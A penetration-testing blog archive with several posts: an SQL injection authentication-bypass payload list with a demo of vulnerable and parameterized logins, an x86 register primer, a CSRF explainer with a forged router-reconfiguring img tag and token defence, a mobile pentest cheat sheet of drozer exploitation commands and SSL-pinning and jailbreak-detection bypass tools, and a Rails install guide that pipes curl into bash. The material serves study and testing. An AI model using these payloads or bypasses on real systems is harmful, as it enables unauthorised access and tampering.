Sunday, April 17, 2016

SQL Injection Authentication Bypass Cheat Sheet

During a penetration test I sometimes find myself testing for SQL injection authentication bypass within a web application, and I got tired of searching all over the place for different payloads, so I decided to create my own payload list. Hopefully someone who comes across this list will find it useful. Remember, this is a growing list that I plan to keep expanding. So enjoy, happy payloading. A few notes on reading the list: the trailing `--`, `#` and `/*` are the three comment styles used to discard whatever the application appends after the injection point (`#` is MySQL-only, and MySQL only treats `--` as a comment when it is followed by whitespace, so add a trailing space there; `/*` opens a block comment that is deliberately left unterminated). The two UNION ALL SELECT payloads are for applications that fetch the stored hash by username and compare it in code: they append a row whose hash is the MD5 of 1234 (81dc9bdb52d04dc20036dbd8313ed055), so the password to submit with them is 1234.



or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
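To see why these strings work, and what closes the hole, here is an added example, not part of the original cheat sheet, in Python against an in-memory SQLite database. The users table, account name and password are constructed for the demo. It models the two query shapes the payloads target: a login that checks the password inside the WHERE clause (defeated by the comment and `or '1'='1` payloads) and one that fetches the stored hash and compares it in application code (defeated by the UNION ALL SELECT payload, which returns a row whose hash is md5('1234')), next to a parameterized version that treats the whole input as a literal.

```python
import hashlib
import sqlite3


def md5_hex(password):
    # MD5 only because the cheat sheet's UNION payload embeds an MD5 digest;
    # a real application should store bcrypt/scrypt/argon2 password hashes.
    return hashlib.md5(password.encode()).hexdigest()


def make_db():
    """Constructed sample database with a single admin account (not from the post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", md5_hex("correct horse")))
    return conn


def login_vuln_sql_checks_password(conn, username, password):
    """Both checks live in the WHERE clause and the username is concatenated in.
    admin' --         comments out the password check.
    admin' or '1'='1  lets the username test alone decide (AND binds tighter than OR)."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password_hash = '%s'" % (username, md5_hex(password)))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_vuln_app_checks_password(conn, username, password):
    """Only the username goes into SQL; the app compares the returned hash.
    A UNION ALL SELECT payload appends an attacker-chosen row, so the 'stored'
    hash becomes md5('1234') and the password 1234 matches it."""
    sql = "SELECT username, password_hash FROM users WHERE username = '%s'" % username
    row = conn.execute(sql).fetchone()
    if row and row[1] == md5_hex(password):
        return row[0]
    return None


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the username as a value, so quotes,
    comment markers and UNION inside it are just characters in a string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, md5_hex(password)),
    ).fetchone()
    return row[0] if row else None


# Payload copied from the list above (SQLite needs no trailing space after --).
UNION_PAYLOAD = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"

if __name__ == "__main__":
    db = make_db()
    print(login_vuln_sql_checks_password(db, "admin' --", "anything"))   # admin
    print(login_vuln_sql_checks_password(db, "admin' or '1'='1", "x"))   # admin
    print(login_vuln_app_checks_password(db, UNION_PAYLOAD, "1234"))     # admin
    print(login_safe(db, "admin' --", "anything"))                       # None
    print(login_safe(db, "admin", "correct horse"))                      # admin
```

The fix is the binding, not the filtering: none of the payloads are rejected by `login_safe`, they simply never reach the SQL parser as syntax. When testing a real target, remember that the comment style that works depends on the database behind the form, so try each of the three endings before concluding a parameter is not injectable.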

Friday, April 8, 2016

Understanding x86 Registers

Good morning all. I'm getting into a reversing state of mind, and as I'm going
through my OSCP journey I wanted to talk about x86 registers, since this is
something you will need to understand in order to learn exploit
development. Well, enough rambling from me, let's get into it.



x86 Registers

The main tools for writing programs in x86 assembly are the processor registers. Registers are like variables built into the processor. Using registers instead of memory to store values makes code faster and cleaner. The problem with the x86 series of processors is that there are few registers to use. This section describes the main use of each register and ways to use them. Note that the rules described here are more suggestions than strict rules: some operations absolutely need a specific register, but most of the time you can use any of them freely.

Here is a list of the registers available on the 386 and higher processors. This list shows the 32-bit registers. Most of them can be broken down into 16- or even 8-bit registers.

General registers
EAX EBX ECX EDX

Segment registers
CS DS ES FS GS SS

Index and pointers
ESI EDI EBP EIP ESP

Indicator
EFLAGS

General registers
As the title says, the general registers are the ones we use most of the time. Most instructions operate on these registers. They can all be broken down into 16- and 8-bit registers.

32 bits :  EAX EBX ECX EDX
16 bits : AX BX CX DX
 8 bits : AH AL BH BL CH CL DH DL

The "H" and "L" suffixes on the 8-bit registers stand for high byte and low byte of the 16-bit register (AH is bits 15-8 of AX, AL is bits 7-0). Writing to a 16- or 8-bit alias changes only those bits; the rest of the 32-bit register is left untouched. With this out of the way, let's see their individual main uses.

EAX,AX,AH,AL : Called the Accumulator register.
               It is used for I/O port access, arithmetic, interrupt calls,
               etc...

EBX,BX,BH,BL : Called the Base register
               It is used as a base pointer for memory access
               Gets some interrupt return values

ECX,CX,CH,CL : Called the Counter register
               It is used as a loop counter and for shifts
               Gets some interrupt values

EDX,DX,DH,DL : Called the Data register
               It is used for I/O port access, arithmetic, some interrupt
               calls.

Segment registers

Segment registers hold the segment selector for various items. They are only available as 16-bit registers. They cannot be loaded with an immediate value; they are set from a general register, from memory, or by special instructions. Some of them are critical for the correct execution of the program, and you should only start playing with them when you are ready for multi-segment programming.

CS         : Holds the Code segment in which your program runs.
             Changing its value might make the computer hang.

DS         : Holds the Data segment that your program accesses.
             Changing its value might give erroneous data.

ES,FS,GS   : These are extra segment registers available for
             far pointer addressing like video memory and such.

SS         : Holds the Stack segment your program uses.
             Sometimes has the same value as DS.
             Changing its value can give unpredictable results,
             mostly data related.

Indexes and pointers

Indexes and pointers are the offset part of an address. They have various uses, but each register has a specific function. They are sometimes used together with a segment register to point to a far address (within a 1 MB range in real mode). The registers with an "E" prefix are the 32-bit forms introduced with the 386.

ES:EDI EDI DI : Destination index register
                Used for string, memory array copying and setting and
                for far pointer addressing with ES

DS:ESI ESI SI : Source index register
                Used for string and memory array copying

SS:EBP EBP BP : Stack Base pointer register
                Holds the base address of the current stack frame; the
                saved return address sits just above it, which is why
                stack overflows aim at it
               
SS:ESP ESP SP : Stack pointer register
                Holds the top address of the stack

CS:EIP EIP IP : Instruction Pointer
                Holds the offset of the next instruction
                It cannot be written directly; only control transfers
                (jmp, call, ret, int) change it, so whoever controls a
                saved return address controls EIP

The EFLAGS register

The EFLAGS register holds the state of the processor. It is modified by many instructions and is used for comparisons, conditional loops and conditional jumps. Each bit holds the state of a specific property of the last instruction. Here is a listing:

Bit   Label    Description
---------------------------
0      CF      Carry flag
2      PF      Parity flag
4      AF      Auxiliary carry flag
6      ZF      Zero flag
7      SF      Sign flag
8      TF      Trap flag
9      IF      Interrupt enable flag
10     DF      Direction flag
11     OF      Overflow flag
12-13  IOPL    I/O Privilege level
14     NT      Nested task flag
16     RF      Resume flag
17     VM      Virtual 8086 mode flag
18     AC      Alignment check flag (486+)
19     VIF     Virtual interrupt flag
20     VIP     Virtual interrupt pending flag
21     ID      ID flag

Those that are not listed are reserved by Intel.
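The sub-register aliasing described under General registers and the status flags from the table above, as an added example in Python that is not part of the original post: a small model of EAX..EDX with their 16- and 8-bit views, plus the flag computation a 32-bit ADD performs (CF, PF, AF, ZF, SF, OF) packed into an EFLAGS value using the bit positions listed. The model, its helper names and the sample operands are constructed for the demonstration; the register names, flag names and bit positions are the ones from the post.

```python
# Bit positions from the EFLAGS table above. Only the arithmetic status flags
# are produced by ordinary ALU instructions; the others are system flags.
FLAG_BITS = {"CF": 0, "PF": 2, "AF": 4, "ZF": 6, "SF": 7, "OF": 11}

# Sub-register views of the four general registers: name -> (32-bit parent, shift, width).
_ALIASES = {}
for letter in "ABCD":
    full = f"E{letter}X"
    _ALIASES[full] = (full, 0, 32)            # EAX
    _ALIASES[f"{letter}X"] = (full, 0, 16)    # AX  = low 16 bits of EAX
    _ALIASES[f"{letter}L"] = (full, 0, 8)     # AL  = low byte of AX
    _ALIASES[f"{letter}H"] = (full, 8, 8)     # AH  = high byte of AX


class Regs:
    """Minimal model of EAX..EDX with their 16/8-bit aliases and EFLAGS (example only)."""

    def __init__(self):
        self.r = {f"E{c}X": 0 for c in "ABCD"}
        self.eflags = 0

    def get(self, name):
        full, shift, width = _ALIASES[name.upper()]
        return (self.r[full] >> shift) & ((1 << width) - 1)

    def set(self, name, value):
        # A partial write replaces only its own bits; the rest of the parent survives,
        # which is why "mov al, 0xff" leaves the upper three bytes of EAX alone.
        full, shift, width = _ALIASES[name.upper()]
        mask = ((1 << width) - 1) << shift
        self.r[full] = (self.r[full] & ~mask & 0xFFFFFFFF) | ((value << shift) & mask)


def add32_flags(a, b):
    """Compute 32-bit a + b the way ADD does and return (result, flag dict)."""
    a &= 0xFFFFFFFF
    b &= 0xFFFFFFFF
    full = a + b
    result = full & 0xFFFFFFFF
    flags = {
        "CF": int(full > 0xFFFFFFFF),                        # unsigned carry out of bit 31
        "PF": int(bin(result & 0xFF).count("1") % 2 == 0),   # even parity of the low byte
        "AF": int(((a ^ b ^ result) & 0x10) != 0),           # carry out of bit 3 (BCD)
        "ZF": int(result == 0),
        "SF": (result >> 31) & 1,                            # sign bit of the result
        "OF": ((a ^ result) & (b ^ result)) >> 31 & 1,       # signed overflow
    }
    return result, flags


def pack_eflags(flags):
    """Build the EFLAGS value from a flag dict using the table's bit positions."""
    value = 0
    for name, bit in FLAG_BITS.items():
        if flags.get(name):
            value |= 1 << bit
    return value


def decode_eflags(value):
    """Names of the status flags set in an EFLAGS value, as a debugger would show them."""
    return sorted(name for name, bit in FLAG_BITS.items() if value >> bit & 1)


def add(regs, dst, src):
    """ADD dst, src on the model: writes dst and updates EFLAGS (32-bit operands only)."""
    if _ALIASES[dst.upper()][2] != 32 or _ALIASES[src.upper()][2] != 32:
        raise ValueError("this model only implements the 32-bit form of ADD")
    result, flags = add32_flags(regs.get(dst), regs.get(src))
    regs.set(dst, result)
    regs.eflags = pack_eflags(flags)
    return result


if __name__ == "__main__":
    r = Regs()
    r.set("EAX", 0x11223344)
    r.set("AL", 0xFF)
    print(hex(r.get("EAX")), hex(r.get("AX")), hex(r.get("AH")))   # 0x112233ff 0x33ff 0x33
    r.set("EAX", 0xFFFFFFFF)
    r.set("EBX", 1)
    add(r, "EAX", "EBX")
    print(hex(r.eflags), decode_eflags(r.eflags))                   # 0x55 ['AF', 'CF', 'PF', 'ZF']
```

Two cases are worth stepping through: 0xFFFFFFFF + 1 wraps to zero and sets CF and ZF but not OF (an unsigned carry, no signed overflow), while 0x7FFFFFFF + 1 gives 0x80000000 and sets SF and OF but not CF. Those are exactly the distinctions jb/jc versus jo/jl test, and what you read off a debugger's EFLAGS line when working out whether a conditional jump will be taken.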

System registers

There are registers on the 80386 and higher processors that application code never touches directly; Intel documents them in the system programming volume of its manuals rather than alongside the application registers above. They are divided into control registers, debug registers, test registers and protected-mode segmentation (memory management) registers. The control registers, along with the segmentation registers, are used in protected-mode system programming. All of these registers are available on 80386 and higher processors except the test registers, which were removed on the Pentium. Control registers are CR0 to CR4, debug registers are DR0 to DR7, test registers were TR3 to TR7, and the protected-mode segmentation registers are GDTR (Global Descriptor Table Register), IDTR (Interrupt Descriptor Table Register), LDTR (Local Descriptor Table Register), and TR (Task Register).

Monday, March 28, 2016

Understanding Cross-Site Request Forgery (CSRF)

This is just a quick guide to understanding Cross-Site Request Forgery: how it works and how it can be prevented. So without wasting any more time, let's get to it :).


So What is Cross-Site Request Forgery?

Cross-Site Request Forgery (CSRF) is an attack, listed in the OWASP Top 10, in which a malicious website causes the victim's browser to send a request to a web application the user is already authenticated against. Because the browser automatically attaches the session cookie to that request, the attacker gets to invoke functionality in the target application with the victim's privileges. Targets include social media, in-browser email clients, online banking and the web interfaces of network devices.


Key Concepts of Cross-Site Request Forgery

  • Malicious requests are sent from a site that a user visits to another site that the attacker believes the victim is authenticated to.
  • The malicious requests are routed to the target site via the victim’s browser, which is authenticated against the target site.
  • The vulnerability lies in the affected web application, not the victim’s browser or the site hosting the CSRF.

Executing a CSRF Attack

In a Cross-Site Request Forgery attack, the attacker is exploiting how the target web application manages authentication. For CSRF to be exploited, the victim must be authenticated against (logged into) the target site. For instance, let’s say I just bought a new home wireless router. Like most wifi routers, it’s configured through a web interface. The router was shipped to me with an internal IP address of 192.168.1.1. I’m having trouble configuring the router though, and fortunately the folks over at somemalicioussite.com have published a guide that shows me exactly what buttons to click in the router interface to get everything set up securely. The attackers have also set up a proxy server at 123.45.67.89 that will log all traffic that goes through it and look for things like passwords and session tokens.

As I clicked through the configuration guide, I missed the 1x1 pixel image that failed to load:

<img src="http://192.168.1.1/admin/config/outsideInterface?nexthop=123.45.67.89" alt="pwned" height="1" width="1"/>

The attackers knew that when I was reading their tutorial I would be logged into the router interface, so they embedded the CSRF attack in the tutorial. My browser fetched the "image" with my router session cookie attached, and the router reconfigured itself so that my traffic would be routed through their proxy server, where they can do all manner of bad things with it. Note that this works because the router accepts a state change over a plain GET; switching the endpoint to POST alone would not fix it, since a hidden auto-submitting form on the attacker's page works just as well.

Preventing Cross-Site Request Forgery (CSRF) Vulnerabilities

The most common method to prevent Cross-Site Request Forgery (CSRF) attacks is to include an unpredictable challenge token (often called a synchronizer or anti-CSRF token) in every state-changing request and to tie it to the user's session. Such tokens should at a minimum be unique per user session, and may be unique per request. A page on another origin cannot read the token out of the victim's session or page, so the server can reject any request that does not carry the right one. The check has to run on every state-changing endpoint, comparing the submitted token server-side against the value stored for that session; a token that is emitted but never verified protects nothing.

Finding and Remediating Cross-Site Request Forgery (CSRF) Vulnerabilities

The easiest way to check whether an application is vulnerable is to see whether each link and form carries an unpredictable per-user token, and then to confirm the server actually rejects the request when the token is removed or altered. Without such a token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.
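To make the router scenario concrete, here is an added example in Python that is not from the original post. It models two handlers for the outsideInterface endpoint: one that behaves like the router in the story (any request carrying a valid session cookie changes the next hop) and one protected with a per-session synchronizer token, then replays a forged cross-site request, a legitimate one, and one carrying a token that belongs to a different session. The session store, handler names and form field names are constructed for the demo.

```python
import hmac
import secrets

# In-memory session store standing in for a web framework's session backend.
# Constructed for this example; not part of the original post.
SESSIONS = {}


def login(user):
    """Create a session. The id goes into the cookie; the CSRF token goes into pages."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32), "nexthop": None}
    return sid


def render_config_form(sid):
    """The server embeds the per-session token in every state-changing form.
    A page on somemalicioussite.com cannot read this HTML, so it cannot copy the token."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="POST" action="/admin/config/outsideInterface">\n'
            f'  <input type="hidden" name="csrf_token" value="{token}">\n'
            '  <input name="nexthop">\n</form>')


def set_nexthop_vulnerable(cookie_sid, params):
    """Mirrors the router in the post: any request with a valid session cookie
    changes the next hop, whether it came from the real form or an <img> tag."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return 401, "not logged in"
    session["nexthop"] = params["nexthop"]
    return 200, "nexthop updated"


def set_nexthop_protected(cookie_sid, form):
    """Synchronizer-token check. `cookie_sid` is attached by the browser automatically;
    `form` is the POST body, which only a page that could read the token can fill in."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return 401, "not logged in"
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be recovered byte by byte via timing.
    if not hmac.compare_digest(supplied.encode(), session["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    session["nexthop"] = form["nexthop"]
    return 200, "nexthop updated"


def extract_token(html):
    """What the legitimate page does implicitly: the token travels with the form."""
    marker = 'name="csrf_token" value="'
    start = html.index(marker) + len(marker)
    return html[start:html.index('"', start)]


def simulate():
    """Owner logs in to the router; a cross-site page then forges the config change."""
    sid = login("owner")
    forged = {"nexthop": "123.45.67.89"}             # what the attacker's <img>/<form> sends
    vuln = set_nexthop_vulnerable(sid, forged)[0]
    prot_forged = set_nexthop_protected(sid, forged)[0]
    legit = dict(forged, csrf_token=extract_token(render_config_form(sid)))
    prot_legit = set_nexthop_protected(sid, legit)[0]
    other_sid = login("attacker")                    # attacker's own account on the device
    stolen = dict(forged, csrf_token=SESSIONS[other_sid]["csrf"])
    prot_other = set_nexthop_protected(sid, stolen)[0]
    return {"vulnerable_forged": vuln, "protected_forged": prot_forged,
            "protected_legit": prot_legit, "protected_other_session_token": prot_other}


if __name__ == "__main__":
    print(simulate())
    # {'vulnerable_forged': 200, 'protected_forged': 403,
    #  'protected_legit': 200, 'protected_other_session_token': 403}
```

The last case is why the token must be bound to the session rather than merely be a valid token: an attacker who can log into the same device with their own account gets a token too, and it must not work against the victim's session.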




Thursday, March 24, 2016

Mobile Application Penetration Testing Cheat Sheet

I'm currently on a journey to learn as much as I can about mobile application penetration testing. During my research I stumbled across a Mobile App Pentest Cheat Sheet that I wanted to share with others who are on the same mobile app security journey as I am. The cheat sheet provides a concise collection of high-value information on specific mobile application penetration testing topics.


Mobile Application Security Testing Distributions

  • Appie - A portable software package for Android Pentesting and an awesome alternative to existing Virtual machines.
  • Android Tamer - Android Tamer is a Virtual / Live Platform for Android Security professionals.
  • AppUse - AppUse is a VM (Virtual Machine) developed by AppSec Labs.
  • Androl4b - A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis
  • Mobisec - Mobile security testing live environment.
  • Santoku - Santoku is an OS and can be run outside a VM as a standalone operating system.
  • Vezir Project - Mobile Application Pentesting and Malware Analysis Environment.

All-in-One Mobile Security Frameworks

  • Mobile Security Framework - MobSF - Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis.
      Start the MobSF web interface (bound to localhost):
        python manage.py runserver 127.0.0.1:1337



Android Application Penetration Testing


Reverse Engineering and Static Analysis

  • APKInspector - APKinspector is a powerful GUI tool for analysts to analyze Android applications.
  • APKTool - A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications.
      Disassembling an Android apk file:
        apktool d [apk file]
      Rebuilding decoded resources back to a binary APK/JAR and signing it (the 1024-bit SHA1 key is only fit for a throwaway test certificate):
        apktool b [modified folder]
        keytool -genkey -v -keystore keys/test.keystore -alias Test -keyalg RSA -keysize 1024 -sigalg SHA1withRSA -validity 10000
        jarsigner -keystore keys/test.keystore dist/test.apk -sigalg SHA1withRSA -digestalg SHA1 Test
  • Sign - Sign.jar automatically signs an apk with the Android test certificate.
  • Jadx - Dex to Java decompiler: command line and GUI tools to produce Java source code from Android Dex and Apk files.
  • Oat2dex - A tool for converting .oat files to .dex files.
      Deoptimize boot classes (the output will be in the "odex" and "dex" folders):
        java -jar oat2dex.jar boot [boot.oat file]
      Deoptimize an application:
        java -jar oat2dex.jar [app.odex] [boot-class-folder output from above]
      Get odex from oat:
        java -jar oat2dex.jar odex [oat file]
      Get odex smali (with optimized opcodes) from oat/odex:
        java -jar oat2dex.jar smali [oat/odex file]
  • FindBugs + FindSecurityBugs - FindSecurityBugs is an extension for FindBugs which includes security rules for Java applications.
  • Qark - This tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs.
  • AndroBugs - AndroBugs Framework is an efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications. No need to install on Windows.
  • Simplify - A tool for de-obfuscating an Android package into classes.dex, which can then be fed to Dex2jar and JD-GUI to extract the contents of the dex file.
        java -jar simplify.jar -i [input smali files or folder] -o [output dex file]
  • ClassNameDeobfuscator - Simple script to parse through the .smali files produced by apktool and extract the .source annotation lines.
  • Android backup extractor - Utility to extract and repack Android backups created with adb backup (ICS+). Largely based on BackupManagerService.java from AOSP.


Dynamic and Runtime Analysis

  • Cydia Substrate - Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected in to the target process's memory.
  • Xposed Framework - Xposed framework enables you to modify the system or application aspect and behaviour at runtime, without modifying any Android application package(APK) or re-flashing.
  • logcat-color - A colorful and highly configurable alternative to the adb logcat command from the Android SDK.
  • Inspeckage - Inspeckage is a tool developed to offer dynamic analysis of Android applications. By applying hooks to functions of the Android API, Inspeckage will help you understand what an Android application is doing at runtime.
  • Frida - The toolkit works using a client-server model and lets you inject in to running processes not just on Android, but also on iOS, Windows and Mac.
  • AndBug - AndBug is a debugger targeting the Android platform's Dalvik virtual machine intended for reverse engineers and developers.
  • Cydia Substrate: Introspy-Android - Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues.
  • Drozer - Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
      Starting a session:
        adb forward tcp:31415 tcp:31415
        drozer console connect
      Retrieving package information:
        run app.package.list -f [app name]
        run app.package.info -a [package name]
      Identifying the attack surface:
        run app.package.attacksurface [package name]
      Exploiting Activities:
        run app.activity.info -a [package name] -u
        run app.activity.start --component [package name] [component name]
      Exploiting Content Providers:
        run app.provider.info -a [package name]
        run scanner.provider.finduris -a [package name]
        run app.provider.query [uri]
        run app.provider.update [uri] --selection [conditions] [selection arg] [column] [data]
        run scanner.provider.sqltables -a [package name]
        run scanner.provider.injection -a [package name]
        run scanner.provider.traversal -a [package name]
      Exploiting Broadcast Receivers:
        run app.broadcast.info -a [package name]
        run app.broadcast.send --component [package name] [component name] --extra [type] [key] [value]
        run app.broadcast.sniff --action [action]
      Exploiting Services:
        run app.service.info -a [package name]
        run app.service.start --action [action] --component [package name] [component name]
        run app.service.send [package name] [component name] --msg [what] [arg1] [arg2] --extra [type] [key] [value] --bundle-as-obj

Network Analysis and Server Side Testing

  • Tcpdump - A command line packet capture utility.
  • Wireshark - An open-source packet analyzer.
      Live packet capture on the device, streamed to Wireshark in real time:
        adb shell "tcpdump -s 0 -w - | nc -l -p 4444"
        adb forward tcp:4444 tcp:4444
        nc localhost 4444 | sudo wireshark -k -S -i -
  • Canape - A network testing tool for arbitrary protocols.
  • Mallory - A Man in The Middle (MiTM) tool used to monitor and manipulate traffic on mobile devices and applications.
  • Burp Suite - Burp Suite is an integrated platform for performing security testing of applications.
  • Proxydroid - Global Proxy App for Android System.

Bypassing Root Detection and SSL Pinning

  • Xposed Module: Just Trust Me - Xposed Module to bypass SSL certificate pinning.
  • Xposed Module: SSLUnpinning - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning).
  • Cydia Substrate Module: Android SSL Trust Killer - Blackbox tool to bypass SSL certificate pinning for most applications running on a device.
  • Cydia Substrate Module: RootCloak Plus - Patch root checking for commonly known indications of root.
  • Android-ssl-bypass - an Android debugging tool that can be used for bypassing SSL, even when certificate pinning is implemented, as well as other debugging tasks. The tool runs as an interactive console.

Security Libraries

  • PublicKey Pinning - Pinning in Android can be accomplished through a custom X509TrustManager. X509TrustManager should perform the customary X509 checks in addition to performing the pinning configuration.
  • Android Pinning - A standalone library project for certificate pinning on Android.
  • Java AES Crypto - A simple Android class for encrypting & decrypting strings, aiming to avoid the classic mistakes that most such classes suffer from.
  • Proguard - ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes.
  • SQL Cipher - SQLCipher is an open source extension to SQLite that provides transparent 256-bit AES encryption of database files.
  • Secure Preferences - Android SharedPreferences wrapper that encrypts the keys and values of Shared Preferences.
  • Trusted Intents - Library for flexible trusted interactions between Android apps.

iOS Application Penetration Testing

Access Filesystem on iDevice

  • FileZilla - It supports FTP, SFTP, and FTPS (FTP over SSL/TLS).
  • Cyberduck - Libre FTP, SFTP, WebDAV, S3, Azure & OpenStack Swift browser for Mac and Windows.
  • itunnel - Use to forward SSH via USB.
  • iFunbox - The File and App Management Tool for iPhone, iPad & iPod Touch.

Reverse Engineering and Static Analysis

  • otool - The otool command displays specified parts of object files or libraries.
  • Clutch - Decrypts the application and dumps the specified bundleID into a binary or .ipa file.
  • Dumpdecrypted - Dumps decrypted mach-o files from encrypted iPhone applications from memory to disk. This tool is necessary for security researchers to be able to look under the hood of encryption.
        iPod:~ root# DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib /var/mobile/Applications/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Scan.app/Scan
  • class-dump - A command-line utility for examining the Objective-C runtime information stored in Mach-O files.
  • Weak Classdump - A Cycript script that generates a header file for the class passed to the function. Most useful when you cannot run class-dump or dumpdecrypted, e.g. when binaries are encrypted.
        iPod:~ root# cycript -p Skype weak_classdump.cy; cycript -p Skype
        cy# weak_classdump_bundle([NSBundle mainBundle], "/tmp/Skype")
  • IDA Pro - IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all.
  • HopperApp - Hopper is a reverse engineering tool for OS X and Linux, that lets you disassemble, decompile and debug your 32/64bits Intel Mac, Linux, Windows and iOS executables.
  • iRET - The iOS Reverse Engineering Toolkit is a toolkit designed to automate many of the common tasks associated with iOS penetration testing.

Dynamic and Runtime Analysis

  • cycript - Cycript allows developers to explore and modify running applications on either iOS or Mac OS X using a hybrid of Objective-C++ and JavaScript syntax through an interactive console that features syntax highlighting and tab completion.
      Show the current view:
        cy# UIApp.keyWindow.rootViewController.topViewController.visibleViewController
      Get an array of existing objects of a certain class:
        cy# choose(UIViewController)
      List methods at runtime:
        cy# [classname].messages
      or
        cy# function printMethods(className) {
              var count = new new Type("I");
              var methods = class_copyMethodList(objc_getClass(className), count);
              var methodsArray = [];
              for (var i = 0; i < *count; i++) {
                var method = methods[i];
                methodsArray.push({selector: method_getName(method), implementation: method_getImplementation(method)});
              }
              free(methods);
              free(count);
              return methodsArray;
            }
        cy# printMethods("[classname]")
      Print out all the instance variables:
        cy# function tryPrintIvars(a) { var x = {}; for (i in a) { try { x[i] = (a)[i]; } catch (e) {} } return x; }
        cy# a = #0x15d0db80
        cy# tryPrintIvars(a)
      Manipulating through properties and swizzling a method:
        cy# [a pinCode]
        cy# [a setPinCode: @"1234"]
        cy# [a isValidPin]
        cy# a->isa.messages['isValidPin'] = function() { return 1; }
  • iNalyzer - AppSec Labs iNalyzer is a framework for manipulating iOS applications, tampering with parameters and methods.
  • idb - idb is a tool to simplify some common tasks for iOS pentesting and research.
  • snoop-it - A tool to assist security assessments and dynamic analysis of iOS Apps.
  • Introspy-iOS - Blackbox tool to help understand what an iOS application is doing at runtime and assist in the identification of potential security issues.
  • gdb - A tool to perform runtime analysis of iOS applications.
  • keychaindumper - A tool to check which keychain items are available to an attacker once an iOS device has been jailbroken.
  • BinaryCookieReader - A tool to dump all the cookies from the binary Cookies.binarycookies file.

Network Analysis and Server Side Testing

  • Canape - A network testing tool for arbitrary protocols.
  • Mallory - A Man in The Middle (MiTM) tool used to monitor and manipulate traffic on mobile devices and applications.
  • Burp Suite - Burp Suite is an integrated platform for performing security testing of applications.
  • Charles Proxy - HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP and SSL / HTTPS traffic between their machine and the Internet.

Bypassing Root Detection and SSL Pinning

  • SSL Kill Switch 2 - Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps.
  • iOS TrustMe - Disable certificate trust checks on iOS devices.
  • Xcon - A tool for bypassing Jailbreak detection.
  • tsProtector - Another tool for bypassing Jailbreak detection.

Security Libraries

  • PublicKey Pinning - iOS pinning is performed through a NSURLConnectionDelegate. The delegate must implement connection:canAuthenticateAgainstProtectionSpace: and connection:didReceiveAuthenticationChallenge:. Within connection:didReceiveAuthenticationChallenge:, the delegate must call SecTrustEvaluate to perform customary X509 checks.







Wednesday, February 17, 2016

Practice CTF List / Permanent CTF List

I'm on a mission to become a great penetration tester. This is a list of CTFs.
Note: some links might or might not work, so just try them.

Live Online Games

Recommended

Whether they're being updated, contain high quality challenges, or just have a lot of depth, these are probably where you want to spend the most time.

Others

Meta

Webapp Specific

Forensics Specific

Recruiting

Paid Training

Downloadable Offline Games

Virtual Machines

Inactive or Gone

Just around for historical sake, or on the off-chance they come back.

Monday, February 15, 2016

How to install Ruby on Rails on CentOS 6

This is a quick tutorial on how to install Ruby on Rails on CentOS 6. Before installing Ruby on Rails I just want to briefly explain what it is: Ruby on Rails is an application stack that gives web developers a framework to quickly create a web application. All right, enough jabbering, let's get on with the installation.

Installing Ruby 2.1.8 using RVM.
NOTE: by default Ruby 1.8.7 is installed on CentOS 6.

Step 1. Install the required packages
# yum install gcc-c++ patch readline readline-devel zlib zlib-devel 
# yum install libyaml-devel libffi-devel openssl-devel make 
# yum install bzip2 autoconf automake libtool bison iconv-devel sqlite-devel
Step 2. Install the latest version of RVM
# curl -L get.rvm.io | bash -s stable
# cd /usr/local/rvm/archives && tar -xzvf rvm-1.26.11.tgz
# cd /usr/local/rvm/archives/rvm-1.26.11/binscripts
# ./rvm-installer
